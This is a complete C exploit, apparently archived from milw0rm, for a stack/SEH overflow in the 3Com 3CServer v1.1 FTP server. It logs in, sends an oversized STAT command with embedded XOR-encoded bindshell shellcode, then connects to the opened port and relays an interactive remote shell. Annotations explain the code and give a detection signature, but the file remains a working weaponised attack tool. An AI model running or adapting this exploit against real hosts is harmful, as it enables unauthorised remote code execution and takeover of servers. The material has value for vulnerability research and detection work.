  1    /*
  2
  3    subject:            Proof of Concept exploit for 3CServer v1.1 FTP server
  4    vendor:             3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm
  5    date:               Mon Feb 7 18:10:01      2005
  6    notes:              universal offset, SEH ptr overwriting with variation
  7    author:             mandragore, mandragore@turingtest@gmail.com
  8
  9    */
  10
  11   #include   <stdio.h>
  12   #include   <strings.h>
  13   #include   <signal.h>
  14   #include   <netdb.h>
  15   #include   <sys/socket.h>
  16   #include   <netinet/in.h>
  17
  18   #define   NORM    "\033[00;00m"
  19   #define   GREEN   "\033[01;32m"
  20   #define   YELL    "\033[01;33m"
  21   #define   RED     "\033[01;31m"
  22
  23   #define BANNER GREEN "[%%] " YELL "mandragore’s sploit v1.0 for " RED "3CServer v1.1.007" NORM
  24
  25   #define fatal(x) { perror(x); exit(1); }
  26
  27   #define default_port 21
  28   #define default_user "anonymous"
  29   #define default_pass "weak@3com.com"
  30
  31   #define GPA 0x0045b968
  32   #define LLA 0x0045b964
  33
  34   #define offset 0x418A19 // call eax
  35
  /*
   * Encoded payload bytes. Per the author's comment below, start() patches two
   * XOR-masked addresses in at 0x1a and 0x2b and main()'s -P handler patches the
   * listen port in at 0x46; the 0xde key named there is the same mask used for
   * those patches. main() measures the array with strlen(): no 0x00 is stored in
   * it (198 bytes, none zero), so the count depends on whatever byte follows the
   * array in memory.
   */
  unsigned char bsh[]={
  // 198 bytes, iat’s gpa at 0x1a, iat’s lla at 0x2b, port at 0x46 (1180), key 0xde
  0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
  0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
  0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
  0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
  0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
  0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
  0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
  0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
  0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
  0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
  0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
  0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
  0xAE,0xD6,0x21,0xC8,0x21,0x0E
  };
  52

  char verbose=0;    // incremented by -v in main(); its only visible effect is the "verbose!" line printed there
  54
  static void start(void) __attribute__ ((constructor));

  /*
   * GCC constructor: runs before main(). XORs the two fixed addresses from the
   * GPA/LLA macros with the 0xdededede mask and stores them into bsh[] at the
   * 0x1a and 0x2b slots named in that array's comment. Copies 4 bytes each, so
   * it assumes a 4-byte int. The definition omits `static`, which C permits
   * after the static prototype above.
   */
  void start() {
          int gpa=GPA^0xdededede, lla=LLA^0xdededede;
          memcpy(bsh+0x1a,&gpa,4);    // same 0xde key the bsh[] comment names, so presumably stored pre-encoded
          memcpy(bsh+0x2b,&lla,4);
  }
  62
  /*
   * Drains whatever the server has sent on s without interpreting it.
   * Returns 1 once a 1 s select() timeout passes with nothing readable, and
   * 0 on a select() error or a read() result below 1 (EOF/error). main()
   * ignores the return value, so FTP reply codes are never checked.
   */
  int readcrap(int s) {
          struct timeval tv;
          fd_set fds;
          int ret;
          char buff[1024];

          FD_ZERO(&fds);
          FD_SET(s,&fds);    // set once; select() rewrites fds in place, and a timeout clears s from it

          bzero(buff,sizeof(buff));    // contents are never examined

          while (1) {
                  tv.tv_sec=1;    // reset every pass: select() may modify tv
                  tv.tv_usec=0;
                  // Precedence: ret = (select(...) < 0). The if tests that same 0/1
                  // value, so it still breaks on error; ret is otherwise unused, and
                  // the (struct timeval *) cast is redundant.
                  if ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )
                          break;
                  if (FD_ISSET(s,&fds)) {
                          // something to read. read() takes three arguments; the fourth is
                          // only tolerated because no prototype is in scope (<unistd.h> is
                          // not included here).
                          if ( read(s,buff,sizeof(buff),0) < 1 )
                                   break;
                  } else {
                           // timeout: s was cleared from fds by select()
                           return 1;
                  }
          }

          return 0; // something went bad
  }
  91
  /*
   * Prints the command-line summary for argv0 to stdout and exits with
   * status 1; never returns. main() also accepts -v, which is not listed
   * here. In this copy of the source the option dashes appear as non-ASCII
   * minus signs (U+2212), an artifact of the document export.
   */
  void usage(char *argv0) {
          int i;    // unused

         printf("%s −d <host/ip> [opts]\n\n",argv0);

         printf("Options:\n");
         printf(" −h undocumented\n");
         printf(" −u user [default: " default_user "]\n");    // defaults pasted in via string-literal concatenation
         printf(" −p pass [default: " default_pass "]\n");
         printf(" −P <port> for the shellcode [default: 1180]\n");

         exit(1);
  }
  105
  /*
   * Interactive relay between the local terminal and socket s: bytes that
   * arrive on fd 0 are sent to s, bytes that arrive on s are written to fd 1.
   * Loops until read()/recv() returns <1 or select() fails, each of which
   * ends the process through fatal(); never returns normally.
   */
  void shell(int s) {
          char buff[4096];
          int retval;
          fd_set fds;

          printf("[+] connected!\n\n");

          for (;;) {
                  FD_ZERO(&fds);    // rebuilt every pass because select() rewrites the set in place
                  FD_SET(0,&fds);
                  FD_SET(s,&fds);

                  if (select(s+1, &fds, NULL, NULL, NULL) < 0)    // NULL timeout: blocks until a side is ready
                          fatal("[−] shell.select()");

                  if (FD_ISSET(0,&fds)) {
                          // fd 0 was polled but fd 1 is read; presumably both are the same
                          // tty when run interactively (the error text says stdin)
                          if ((retval = read(1,buff,4096)) < 1)
                                  fatal("[−] shell.recv(stdin)");
                          send(s,buff,retval,0);    // return value unchecked: a short send drops bytes silently
                  }

                  if (FD_ISSET(s,&fds)) {
                          if ((retval = recv(s,buff,4096,0)) < 1)
                                  fatal("[−] shell.recv(socket)");
                          write(1,buff,retval);    // return value unchecked
                  }
          }
  }
  134
  /*
   * Entry point. Parses the command line, logs in to the FTP service on the
   * given host with the given user/pass, sends one oversized STAT command that
   * carries bsh[] plus the fixed address from `offset`, then connects to Port
   * on the same host and hands that socket to shell(). Exits 1 from any
   * fatal() path; shell() itself never returns normally. `env`, Host and
   * bindopt are unused.
   */
  int main(int argc, char **argv, char **env) {
          struct sockaddr_in sin;
          struct hostent *he;
          char *host; int port=default_port;    // host is only set by -d; it is read uninitialized below if -d is omitted
          char *Host; int Port=1180; char bindopt=1;
          int i,s;
          char *buff, *jmpback="\xe9\x35\xff\xff\xff";    // 5-byte relative jump placed right after bsh[] in the STAT argument
          char *user=default_user; char *pass=default_pass;

          printf(BANNER "\n");

          if (argc==1)
                  usage(argv[0]);

          // Every option is assumed to take a value: argv[i+1] is read without
          // checking i+1 < argc (only -v steps i back to compensate).
          for (i=1;i<argc;i+=2) {
                  if (strlen(argv[i]) != 2)
                          usage(argv[0]);

                  switch(argv[i][1]) {
                          case ’d’:
                                  host=argv[i+1];
                                  break;
                          case ’u’:
                                  user=argv[i+1];
                                  break;
                          case ’p’:
                                  pass=argv[i+1];
                                  break;
                          case ’P’:
                                  // Port is XOR-masked with 0xdede and byte-swapped to match how the
                                  // payload stores it (bsh[] comment: "port at 0x46"), patched in,
                                  // then the same two steps are applied again to restore the value
                                  // printed below. Only 2 bytes are copied.
                                  Port=atoi(argv[i+1])?:1180;    // GNU ?: keeps 1180 when atoi() yields 0
                                  Port=Port ^ 0xdede;
                                  Port=(Port & 0xff) << 8 | Port >>8;
                                  memcpy(bsh+0x46,&Port,2);
                                  Port=Port ^ 0xdede;
                                  Port=(Port & 0xff) << 8 | Port >>8;
                                  break;
                          case ’v’:
                                  verbose++; i−−;    // -v takes no value, so undo the i+=2 stride
                                  break;
                          case ’h’:
                                  usage(argv[0]);
                                  /* usage() exits; the fall-through into default is never reached */
                          default:
                                  usage(argv[0]);
                  }
          }

          if (verbose)
                  printf("verbose!\n");

          if ((he=gethostbyname(host))==NULL)
                  fatal("[−] gethostbyname()");

          sin.sin_family = 2;    // literal AF_INET
          sin.sin_addr = *((struct in_addr *)he−>h_addr_list[0]);
          sin.sin_port = htons(port);

          printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he−>h_addr_list[0])),port);
          printf("[.] will try to put a bindshell on port %d.\n",Port);

  // --------------------       core

          s=socket(2,1,6);    // literal AF_INET, SOCK_STREAM, IPPROTO_TCP; a -1 result is not checked

          if (connect(s,(struct sockaddr *)&sin,16)!=0)
                  fatal("[−] connect()");

          printf("[+] connected, sending exploit\n");

          buff=(char *)malloc(4096);    // result not checked for NULL
          bzero(buff,4096);

          // Reply codes are never examined: readcrap() only drains the socket, so
          // a rejected login does not stop the STAT command from being sent.
          readcrap(s);
          sprintf(buff,"USER %s\r\n",user);    // unbounded: a user/pass argument longer than ~4 KB overruns buff
          send(s,buff,strlen(buff),0);
          readcrap(s);
          sprintf(buff,"PASS %s\r\n",pass);
          send(s,buff,strlen(buff),0);
          readcrap(s);

          // buff is a pointer here, so sizeof(buff) is the pointer size, not 4096;
          // the bzero(buff,4096) above is what actually zeroed the allocation.
          bzero(buff,sizeof(buff));
          // The overflow vehicle, as the header comment describes it (SEH pointer
          // overwrite): "STAT " followed by 2000 filler bytes of 0x41. Offsets are
          // relative to the byte after "STAT ": bsh[] is placed so it ends at +0x571,
          // jmpback sits at +0x571, and the `offset` address is stored at +0x5d9.
          // strlen(bsh) counts until the first 0x00 byte, and bsh[] stores none, so
          // the length depends on what follows the array in memory.
          // For detection: an FTP STAT whose argument is ~2 KB of one repeated byte
          // is a clear signature of this request; the hard-coded GPA/LLA/offset
          // addresses tie the payload to the server build named in BANNER.
          strcpy(buff,"STAT ");
          memset(buff+5,0x41,2000);
          memcpy(buff+5+0x571−strlen(bsh),&bsh,strlen(bsh));
          memcpy(buff+5+0x571,jmpback,strlen(jmpback));
          i=offset;
          memcpy(buff+5+0x5d9,&i,4);    // assumes a 4-byte int

          send(s,buff,strlen(buff),0);    // strlen stops at the first zero byte left over from the zeroed allocation
          readcrap(s);

          free(buff);

          close(s);    // close() and sleep() below have no prototype in scope (<unistd.h> not included)

  // --------------------   end of core

          sin.sin_port = htons(Port);    // same host, the port the payload is expected to listen on
          sleep(1);
          s=socket(2,1,6);
          if (connect(s,(struct sockaddr *)&sin,16)!=0)
                  fatal("[−] exploit most likely failed");
          shell(s);

          exit(0);
  }
  240
  241   // milw0rm.com [2005-02-07]



